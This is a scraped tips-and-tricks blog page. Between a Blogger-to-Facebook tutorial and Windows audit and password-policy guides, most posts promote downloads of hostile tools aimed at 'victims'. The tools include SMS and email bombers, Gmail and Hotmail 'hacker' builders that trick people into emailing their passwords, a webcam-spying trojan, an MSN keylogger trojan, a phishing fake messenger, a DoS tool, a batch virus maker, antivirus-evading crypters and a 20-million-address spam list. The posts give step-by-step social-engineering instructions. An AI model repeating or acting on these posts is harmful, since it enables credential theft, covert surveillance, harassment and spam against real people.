Add Your Blogger Blog to Facebook

In today's Blogger tutorial I will show how to add your Blogger blog (Blogspot blog) to Facebook so that your updated content can be read right from your Facebook profile. Importing your Blogger blog into Facebook will only take you a few minutes to set up but will likely produce quite a few extra readers.

By importing your blog into Facebook your Blogger posts become available to all your Facebook friends and family. Everytime you post new articles to your Blogger blog they will automatically appear on your Wall in Facebook and in your friends News Feeds. It is also possible to remove any content that you do not wish to be displayed which may be handy for some.

Advantages of Importing Your Blog into Facebook
  • Increase your web presence
  • Enjoy added interest in your blog articles and new readers
  • No need to replicate your blog articles or content on Facebook

Disadvantages of Importing Your Blog into Facebook
  • If you blog for profit think carefully about importing your Blogger blog into Facebook as you are likely to experience a drop off in traffic and a reduction in revenue earnings as fewer people will visit your actual blog. One possible way around this is to set your blog's RSS feed to show summaries only that way ensuring that anyone interested will need to visit your blog to read the whole article.

How to Import or Add Your Blogger Blog to Facebook
  1. Login to Facebook or Sign up to Facebook if you are not already a member

  2. From your Facebook profile page go to Settings > Application Settings which you will find in the top right hand corner


  3. Select Notes from the list of applications displayed on the page

  4. Click on Import a Blog in the right sidebar

    Facebook - Add Notes Screen (Settings, Applications Settings, Notes)
  5. Enter the URL address of your blog

    either website URL:
    http://blogknowhow.blogspot.com

    or your Blogger feed: http://blogknowhow.blogspot.com/feeds/posts/default?alt=rss
    Please note it is not necessary to add the feed of your blog as Facebook will autodetect this


    Facebook - Import a Blog Screen
  6. You will need to tick the box below this to confirm that the content is not illegal or obscene and that you have the right to permit Facebook to reproduce the content of your blog. Any problems click Cancel and reenter your blog URL address

  7. Click Start Importing

  8. Facebook will now import your feed and you will be taken to a preview screen to make sure the content matches your blog. If it does go ahead and confirm the import by clicking on the Confirm Import button

    Facebook - Preview Screen for import a blog showing latest content

  9. Go to your Wall in Facebook to check that your Blogger posts are now available to all your Facebook friends and family.


Tips and Troubleshooting
  • If your Blogger blog is members only the blog import will fail as Facebook will be unable to detect your blog's feed

  • To remove a blog post from your Wall in Facebook click on the Remove button on the righthand side

  • If your images are not displaying (there seems to be a bit of a glitch with this) then you may need to try importing your blog using Networked Blogs


In this Blogger tutorial I have discussed how to import your Blogger blog into your Facebook profile. I have also pointed out some advantages and disadvantages of adding your Blogger blog to your Facebook profile. I will be talking some more about importing blogs into Facebook in the future which is likely to be of interest to those with multiple Blogger blogs.


Related Articles
List of Blog Know How Tutorials for Blogger Blogs


Read more ...

BOMB MOBILE PHONE WITH SMS : BEAVER'S SMS BOMBER PRO


This program will bomb the victim's mobile phone with tons of SMS. It supports all major networks around the world. But if your network is not in the list, then don't worry, you can also add the carrier network with the help of "custom" option. You can also load list of multiple victims and bomb them simultaneously. The improvement that Beaver has made in this version over his previous SMS Bomber is that you can spoof the email address from which you are bombing the victim's mobile phone. For Example, If there was an error sending the message, it will ask you if you wanna change the E-mail/Password you are using. All credits to Beaver for this nice program.

Download here 

http://www.mediafire.com/download.php?zmd4mtbmtol
Read more ...

HACK THE HACKER : BIN TEXT


Bin Text is basically a text extractor software used to extract text from application or any file. It can extract email ID and password from applications like Hotmail Hacker and Gmail Hacker. Step by Step usage and tutorial is below:

1. Refer my article Hack Gmail Accounts : Gmail Hacker to create Gmail Hacker.exe file.
2. Unzip the downloaded Bin Text software in a separate folder.
3. Open Bin Text and browse for the location where you have kept the Gmail Hacker.exe file that you have created. Now Hit Go.
4. Bin Text will scan the whole file and display all the extracted text from Gmail Hacker.exe file.
5. Now scroll down till you find email address and password as I have shown in the screen shot above.

This means that if your friend or someone else has given you this Gmail hacker software and told you that this software can hack email accounts and if you feel suspicious of him, you can easily hack his email account password. Enjoy hacking the hacker!!!

Download here:

http://www.mediafire.com/download.php?yoeiinztzyy
Read more ...

HACK HOTMAIL ACCOUNTS : HOTMAIL HACKER


I had previously discussed about Gmail Hacker to hack Gmail accounts. Likewise, this software can hack Hotmail accounts. Just follow the steps below:

1. Extract the RAR archive in a separate folder.
2. Run Hotmail Hacker Builder.exe file on your computer.
3. Enter your email address, password and subject of email you wanna receive. I suggest you to create a new email ID for this. You can use Gmail or Yahoo but avoid using Hotmail account. This email will contain the password you wanna hack. Also select appropriate smtp server address. The default smtp server address 587 is of gmail. You can google for smtp server addresses or can find it here. Also, write a fake error message to display on the screen or leave it default.
4. Click on "Build". This will create your own Hotmail hacker in Hotmail hacker folder.
5. Now, send this Hotmail Hacker.exe file to victim of which you wanna hack Hotmail password and convince him that this program can hack anyone's Hotmail password (lil bit of Social Engineering).
6. Ask him to run Hotmail Hacker.exe and enter all information including his Hotmail ID and password and Hotmail ID of victim he wanna hack. As he enters this information and hits "Login and Start", he will receive a error message.
7. You will receive an email in your account containing his password. Hooray!!! you will now be able to hack hotmail password. Enjoy!!!

Download here:

http://www.mediafire.com/download.php?zjogjlw0ndm
Read more ...

IM SPAMMER



This program can spam the MSN conversations with the characters you type. Just type the message in the box to spam and click Spam and see the live ruin show. It will send unlimited messages until you hit Stop. When I tested this personally on my computer, it caused my PC to hang and ultimately, I had to restart my system.

Download here:

http://www.mediafire.com/download.php?czmzgzxmnyn
Read more ...

EMAIL SPAMMER : GMAIL MAIL 2.1


Gmail Mail 2.1 is another simple mail spammer to bomb your victim's email account with tons of emails. Unlike other email bombers I have presented, this one has the special capability to spam the victim's email account with different Gmail accounts simultaneously. We can use upto 4 different Gmail accounts to spam the victim's email account and believe me, it has a lightning fast speed.

Download here: 


http://www.mediafire.com/download.php?jud2lngmxkm
Read more ...

HACK GMAIL ACCOUNTS : GMAIL HACKER


This software will hack Gmail accounts. All you need is a bit of social engineering. Just follow the steps below:

1. Extract the RAR archive in a separate folder.
2. Run Gmail Hacker Builder.exe file on your computer.
3. Enter in your Gmail address and password (I created a new Gmail ID to test this and I recommend you to do the same). Hit on Build. Then Gmail hacker builder will create your own Gmail hacker application - Gmail Hacker.exe file which you can use to hack gmail password.
4. Now, send this Gmail Hacker.exe file to victim of which you wanna hack Gmail password and convince him that this Gmail hacker can hack Gmail password (Social Engineering as I already said).
5. Ask him to run Gmail Hacker.exe and enter all information including his Gmail ID and password and Gmail ID of victim he wanna hack. As he enters this information and hits "Hack Them", he will receive an error message
6. You will receive an email in your account containing his password. Enjoy!!!

Download here:

http://www.mediafire.com/download.php?znjl0mezh0n
Read more ...

HACK MSN ACCOUNTS : MESS SPY



With this program, you can turn on the webcam of anyone who is chatting with you on MSN messenger and spy on him/her without his/her knowledge and permission. Just send the "TheUltimate Msn Toolz.exe" file to your victim. When victim runs the application, their webcam will turn on. The freezer and booter will work as normal, so the victim wont know that they are being watched. Even if they shut the application down, it should still run in the background. You then open the (mess-spy) part and enter their IP address. Leave the port set to 4440 and connect.

Download here:

http://www.mediafire.com/download.php?czmzgzxmnyn
Read more ...

INVISIBLE SECRETS 2.1


With this program, you can hide/encrypt any file say a program, song, document etc in a carrier file (JPEG or BMP image) and send it to anyone secretly without exposing it to world and your friend or other person can decrypt it on other end using this software. You can also specify the password for encryption and decryption. The person on other end can only decrypt the file if he has this software and knows the encryption password. With this software, you can also:
  • Delete carrier file after process
  • Add fake files to play pranks on friends  
  • Add other carrier formats (.doc, .txt etc.) other than JPEG or BMP images which are default
Download here:

http://www.mediafire.com/download.php?ogzmhzzzhhm
Read more ...

Anonymous Email

Learn how to send an email messages anonymously and secretly so that recipient will never know who sent that message and from where.

There are many reasons to send an email anonymously, for example send an email to a friend when you have no access to your regular email account, or make fun of your enemy, etc. There are various websites from where you can send anonymous email. So am posting here some of the best sites which helps you to send anonymous email.

1. SendAnonymousEmail – Is a free service which allow you to send unlimitted anonymous email. It's one of the most popular anonymous email service on the net.

2. deadfake is a site that lets you send free fake emails to anyone you like. There’s no signup, no registration, no fuss. You can even send fake emails with rich text; fonts, colours, etc.

3. send-email.org - Useful site to quickly send an anonymous message.

4. AnonEmail - With AnonEmail it is possible to send e-mails without revealing your e-mail address or any information about your identity.

5. Formmail Anonymous Mailer - This website allows you to specify a sender’s address as well, allowing you to seemingly send it from a normal mail account.


These are some of the best websites which allows you to send free anonymous email messages. So if you have no access to your email account, or if you want to confess your love to somebody, or want to play an email joke with your friend... this websites surely will come in handy.
Read more ...

Top Tools to Find Invisible Yahoo Messenger Users

Top tools to detect online status for yahoo messenger. Scan online, offline and invisible status for yahoo messenger.

I'm shure all of yahoo messsenger member knows that Yahoo has a Stealth settings feature that lets you choose the people who see you as online and offline (Invisible Mode), but have you ever wondered if your Friend is in Invisible mode or its Offline? Now you can spy your buddy to see his/her real yahoo status.

1. XEEBER - The best and easy way to detect your buddy is XEEBER. With Xeeber you can discover who is online available at yahoo messenger and who is invisible.

2. Invisible.ir is a website for Yahoo! Messenger status checking. With invisible.ir you can now bypass Yahoo! Messenger's Invisible Settings with ease. With its quick and intuitive interface invisible.ir offers you the ability to see if your friend is truly online or if they are invisible.

3. Invisible-scanner.com - Invisible-scanner.com is a new webtool which also help you to find the Invisible user and also let you know which Avatar he is Using.

4. 4invisible.com is a website from where you can find invisible people in yahoo! messenger with their avatar.

5. Imvisible - IMvisible is one of the fastest free Yahoo Messenger invisible detectors.
Read more ...

FAKE MSN FREEZER


As the name says, this software do not freeze MSN accounts but you can use it to play pranks on your friends. You can send it to your friend telling him that it freezes people's MSN accounts. When he/she will double-click it, it will shutdown their PC within 30 seconds. You can also bind some keylogger or RAT to it with a binder and crypt it with a crypter if you really wanna hack them.

Download here:

http://www.mediafire.com/download.php?o0wmm2zhtnw
Read more ...

HACK MSN ACCOUNTS : MSN TROJAN V5.1


This program is actually a trojan which you can send to someone in a MSN conversation. As soon as the person clicks it, you will be able to monitor his PC activities and also record his keystrokes. You just need to make sure that your victim's antivirus program is disabled when he/she opens it. Alternatively, you can use Binder and Crypter software to successfully infect him. All you have to do is to send the file named "DON'T OPEN THIS, RENAME IT.exe" in the archive to the victim and you will be able to control him remotely through commands which are given in text file placed in the archive.

Download here:

http://www.mediafire.com/download.php?0yodooearil
Read more ...

SMAC : THE MAC ADDRESS CHANGER


SMAC is a powerful and easy to use MAC Address Changer (Spoofer) for Windows systems, regardless of whether the network card manufacturers allow this option or not. Its features include:
  • Automatically Activate new MAC Address after changing it
  • Show the manufacturer of the MAC Address 
  • Randomly Generate any New MAC Address or based on a selected manufacturer
  • Pre-load MAC Addresses List and choose the new MAC address from the list.
  • IPConfig button - click to show network adapter (IPConfig) info to confirm changes
  • User-friendly GUI
Download here:

http://www.mediafire.com/download.php?4djm2znbtmu
Read more ...

WINDOWS PASSWORD RECOVERY TOOL : SAMINSIDE


SAMInside recovers Windows NT/2000/XP/2003/Vista user passwords by implementing following types of password attack:
  • Brute-force attack
  • Distributed attack 
  • Mask attack 
  • Dictionary attack 
  • Hybrid attack 
  • Pre-calculated tables attack 
 It includes various types of data imports like LM/NT Hashes, PWDump, LC, LST etc.

Download here:

http://www.mediafire.com/download.php?5mdigznwlzm
Read more ...

PASSLIST GENERATOR FOR BRUTE


This program generates random password lists for bruteforcing. It generates the passwords at a lightning speed. But as you know, longer the password, little more time it will take. It has a simple interface which asks two simple questions. You just have to answer them and this program will generate the password list in password.txt file in the same directory so that you can use it in a program like Bruteforcer, Brutus etc for bruteforce attack.

Download here:

http://www.mediafire.com/download.php?mrqnu2fzjmm
Read more ...

20,000,000 EMAIL ADDRESS LIST FOR SPAMMERS



This huge list of email addresses includes Yahoo, MSN/Hotmail, Gmail and many other users. I can't say all but most of the email addresses are valid ones and I have specially provided this list for people who love spamming. The archive also includes Vallen emailer which has the capability to import multiple lists of email addresses and spam them.

Download here:

http://www.mediafire.com/download.php?mmzy0mjmf0w
Read more ...

HACKER TOOLS



This is a nice collection of' "must have" tools for a hacker such as RAT, keylogger, mail bomber, crypter etc. The advantage of using this package is that all the tools are joined under the same GUI and all the tools are FUD i.e. they will not be detected by your antivirus. So I advice you to use them at your own risk. Alternatively you can use Sandboxie or Deep Freeze to protect your computer if something unexpected happens.

Download here (Pass included in archive):

http://www.mediafire.com/download.php?qz0myynoguy
Read more ...

HACK MSN ACCOUNTS : MESS BOOTER


This program floods the victims' IM conversations with characters that you type. You can optionally choose from currently open windows and spam any of them.     

Download here:

http://www.mediafire.com/download.php?jnzzj5ymcla
Read more ...

CPU DEATH PING 2.0


This amazing software is basically a Dos (Denial of Service) tool. It will create a batch file on your desktop, so, you can open multiple Floods, so it floods the user with more dramatic Freezes, Errors, Shutdowns, etc. You can also DDos IPs, You can send a massive amount of users on a website, lowering its bandwidth down so it comes down, you can also send a mass-ping operation, this can cause errors, or freezes.

Download here:

http://www.mediafire.com/download.php?ngjzmxymjzg
Read more ...

HACK MSN ACCOUNTS : FAKE MSN


This is a wonderful program which looks like real MSN messenger but in reality, it hacks your victim's MSN password. Just make them login into this fake messenger and you will get a text file containing their user name and password in it.

Download here:

http://www.mediafire.com/download.php?h3mtjd2z2my
Read more ...

EMAIL SPAMMER : BOMB THEM!


Bomb Them! is another simple and very fast email bomber designed to bomb your victim's email account with thousands of emails. As most email bombers do, it uses your Gmail account, and also includes "sending in HTML" and priority feature which results in faster sending of mails.

Download here:

http://www.mediafire.com/download.php?mmm232uyy2n
Read more ...

DARK PORT SCANNER


Dark Port Scanner is a simple port scanner with an easy to use interface which scans for open ports on computers in a network.

Download here:

http://www.mediafire.com/download.php?lkymnzkmmmo
Read more ...

Back links

If you want to be added on the list below, put my blog in your blogroll/link list
[MY BLOG URl is http://listworld-tipstricks.blogspot.com/]
[MY BLOG TEXT is Tips and tricks and listings]
and put your BLOG URL and BLOG TEXT below via the comment section. Thanks! =]

SnapHow

Latest Blogger Tricks

Fun PC Life

Cyza Sector

Latest Blogger Tricks

Link Market - Free Link Exchange, Link Building and Link Trade Directory
Have you ever tried to exchange links, link building, or trade links? Was it hard? Use link market instead; - it is easy to use, free and very smart. It will save you hours of work.

health

www.freecreditreport.com review

The Simplest Computer Tricks

Tricksmachine.com

Your Search For Tech Stuffs

StockToday - FREE!! Stocks Buy & Sell Tips and much more!

Logicclub | Need Logic To Move

Killer Tricks

Web Directory

islam-ism.blogspot.com

Tricksdaddy.com

www.pocketmoneyfinder.com

Start Ranking

Resource Central

Ranking Web Directory

allinforexrate.blogspot.com

tipsfitnes.blogspot.com

expertstipstricks.blogspot.com

Affordable Shopping Cart Software and Network Management Systems by Maxxfusion – Website design - hosting - maintenance
Read more ...

SONIC BAT - THE BATCH FILE VIRUS CREATOR



This program creates batch (.bat) viruses and has varied options to ruin the victim computer in different ways. We can flood the storage space on victims' computer by making large number of files in different folders by using its "folder flood" feature. It also includes bat to exe converter to convert your batch virus files into exe virus programs and an icon changer.

Download here:

http://www.mediafire.com/download.php?ijzjmx3kd3t
Read more ...

HACK MSN ACCOUNTS : CEDP STEELER 6.0



With this program, you can steal any emotion, animation or display picture of your contacts on Windows Live Messenger and MSN Messenger.

Download here:

http://www.mediafire.com/download.php?zlywjwwgnlk
Read more ...

SWISS ARMY KNIFE


Swiss Army Knife is a multifunctional program which allows us to perform simple tasks of our computer like logoff, shutdown, opening Task Manager, internet explorer or firefox etc. It also has inbuilt hacking tools like Port Scanner, Email Bomber, Facebook Freezer, IM Spammer and also a Batch Virus creator.

Download here:

http://www.mediafire.com/download.php?mnyduzejtkn
Read more ...

CRYPTER SOFTWARE TO BYPASS ANTIVIRUS DETECTION : FUD KRYPTONITE CRYPTER


This is another FUD crypter used to crypt the source code of your keylogger, RAT or botnet etc so that they are not detected by antiviruses. The advantage of using it is that it is almost FUD, only Avira and Sophos Antivirus detected it on NoVirusThanks.

Download here:

http://www.mediafire.com/download.php?ccjlomwh5mm
Read more ...

BOMB MOBILE PHONE WITH SMS : GLOBAL SMS BOMBER


Global SMS Bomber is another nice program which can bomb victims' mobile phone with hundreds of SMS. It uses your Gmail account to do that and incorporates over 100 networks all around the world.


Download here:

http://www.mediafire.com/download.php?rfxzf4jcjm2
Read more ...

Audit Policy Settings Basic to In-depth Home Computer Security Guide Page 24



Search Engine Optimization and SEO Tools



Audit Policy Settings

User can set the Audit Policy Setting to determine the security events to report the user or system activity. For example, the user can choose to audit failed logon attempts, which might indicate that someone is trying to log on with an invalid password (perhaps using a program to automate the attack). Or user might want to monitor the use of a particular sensitive file. The user can also choose to monitor changes to user accounts and passwords, changes to security policies, and use of privileges that might reveal that someone is trying to "administer" user’s computer—perhaps not with user’s best interests in mind.
Unlike the other logs that appear in Event Viewer, the Security log is disabled by default in Windows XP Professional and Windows 2000. No events are written to the Security log until the user enable auditing, which is done via Local Security Settings. (In Windows XP Home Edition, security auditing is enabled for certain events. Because Home Edition doesn't include Local Security Settings, user cannot change which events are audited unless he use a tool like Auditpol.exe, which is included in the Windows 2000 Resource Kit.) Even if the user sets up auditing for files, folders, or printers, the events he specified aren't recorded unless he also enables auditing by setting a high-level audit policy in
Local Security Settings.

To edit the Audit Policy Setting Start menu\Settings\Control Panel\Administrative Tools\Local Security Settings\local Policies\Audit Policy and check the boxes accordingly

The following table gives the Audit policy available in Windows Operating System with their respective descriptions.

Table-1: Audit Policies for Security Events

Policy Description
Audit account Account logon events occur when a user attempts to log on or log off
logon events across the network, authenticating to a local user account.

Audit account Account management events occur when a user account or security
management group is created, changed, or deleted; when a user account is
renamed, enabled, or disabled; or when a password is set or changed.

Audit directory Directory service access events occur when a user attempts to access
service access an Active Directory object. (If the computer is not part of a Windows
domain, these events won't occur.)

Audit object Logon events occur when a user attempts to log on or log off a
events workstation interactively.

Audit object Object access events occur when a user attempts to access a file,
access folder, printer, registry key, or other object that is set for auditing.

Audit policy Policy change events occur when a change is made to user rights
change assignment policies, audit policies, trust policies, or password
policies.

Audit privilege Privilege use events occur when a user exercises a user right (other
use Than logon, logoff, and network access rights, which trigger other
types of


Audit process Process tracking includes events such as program activation, handle
tracking duplication, indirect object access, and process exit. Although this
policy generates a large number of events to wade through, it can
provide useful information, such as which program a user used to
access an object.

Audit system System events occur when a user restarts or shuts down the computer
events or when an event affects the system security or the Security log.


Local Security Settings has some additional policies that affect auditing, but they're not in the Audit Policy folder. Instead, look to the Security Settings\Local Policies\ Security Options folder for these policies:

• Audit: Audit the user of Backup and Restore privilege. Enable this policy if the user wants to know when someone uses a backup program to back up or restore files. To make this policy effective, user must also enable Audit Privilege Use in the Audit Policy folder.

• Audit: Shut down system immediately if unable to log security audits.

• Audit: Audit the access of global system objects. This policy affects auditing of obscure objects (mutexes and semaphores, for example) that aren't used in most home and small business networks; users can safely ignore it.

The user should only enable the audit policies which he requires to monitor. As it is a time-consuming process and can waste a lot of resources. When the auditing is enabled, the system must write an event record to the Security log for each audit check the system performs. This activity can degrade the computer’s performance. There is absolutely no need to enable them all, it’s purely on the requirement of the user, like Audit Directory Service Access is not required for the home user who is not connected to any Windows Active Directory network.

In addition, indiscriminate auditing adds to log many events that might be of little value to the user, thereby making the real security issues more difficult to find. And because the Security log has a fixed size, filling it with unimportant events could displace other, more significant events.

Here are some suggestions for what user should consider auditing:


• Audit failed logon attempts, which might indicate that someone is trying to log on with various invalid passwords.

• If the user is concerned about someone using a stolen password to log on, audit successful logon events.

• To detect use of sensitive files (such as a payroll data file, for example) by unauthorized users, audit successful read and write access as well as failed attempts to use the file by suspected users or groups.

• If the user use his computer as a Web server, he will want to know whether an attacker has defaced his Web pages. By auditing write access to the files that make up the Web pages, user will know whether his site has been vandalized.

• To detect virus activity, audit successful write access to program files (files with .exe, .com, and .dll file name extensions).

• If the user is concerned that someone is misusing administrative privileges, audit successful incidents of privilege use, account management, policy changes, and system events.


Event Viewer

A component a user can use to view and manage event logs, gather information about hardware and software problems, and monitor security events. It maintains logs of three kinds: application, system, and security.

Checkout for the security logs in event viewer regularly.

To open Event Viewer follow steps given below:

Start menu\Setting\Control Panel\Administrative Tools\ Event Viewer



Thats the End of Tutorial in Future I will update this tutorial.
Read more ...

Various Techniques Used by Hackers to Retrieve Passwords Basic to In-depth Home Computer Security Guide Page 23

Various Techniques Used by Hackers to Retrieve Passwords


·One way of stealing the password is standing behind an individual and over looks their password while they are typing it or search for the papers where they have written the password.

·Another way of stealing the password is through guesses. Hackers try all the possible combinations with the help of personal information of an individual.

·When there are large number of combinations of passwords, the hackers uses fast processors and some software tools to crack the password. This method of cracking password is known as “Brute force attack”.

·Hackers also try all the possible words in an dictionary to crack the password with the help of some software tools. This is called a “dictionary attack”.

Sample password:

IJ!5iS@g0odP4s5wD ---->This is a good password

administrator123 --->bad password


Password Policy

It’s a general practice of users to keep the same password for life long; rather users should change their passwords regularly.

Password should be complex and change regularly. Password policy setting controls the complexity of the password. To edit the password policy setting, go to Start menu\Settings\Control Panel\Administrative Tools\Local Security Setting\Account Policy\Password Policy\ set each and every option

• Enforce Password History

• Maximum Password Age

• Minimum Password Age

• Minimum Password Length

• Password Must Meet Complexity Requirement

Whenever the user is required to use a password, he should use a strong password that conforms to the following Countermeasures:

• At least seven characters in length (the longer the better)

• Includes upper and lower case letters, numerals, symbols

• Has at least one symbol character in the second through sixth position

• Has at least four different characters in given password (no repeats)

• Looks like a sequence of random letters and numbers

• Don’t use any part of logon name for the password

• Don’t use any actual word or name in ANY language

• Don’t use numbers in place of similar letters

• Don’t reuse any portion of old password

• Don’t use consecutive letters or numbers like "abcdefg" or "234567"

• Don’t use adjacent keys on the keyboard like "qwerty"

A good way to create a strong password is by using the first letters of a phase that user can easily remember.


Login settings

Windows NT, 2000 and XP come with many built in users and groups. These include the Administrator, Backup Operator, Guest, Power User and many more. The purpose of these groups is to enhance the abilities of a user without having to make that user an Administrator. However, due to the powers granted to these groups any user that is a member of one can become an Administrator. All unnecessary users must be disabled.

To disable unwanted accounts follow the steps as follows. Go to Start menu\Settings\Control Panel\Administrative Tools\Computers Management\Local Users and Groups\Users. Double click the account user want to disable and Check the box see Figure-15.



Figure-16: Account is disabled

Continued...................
Read more ...
All Tips And Tricks Information Computer tricks in tamil Hindi Mobile tips tricks 2013 HAcking tricks Airtel Idea Vodafone Tata Docomo Tricks internet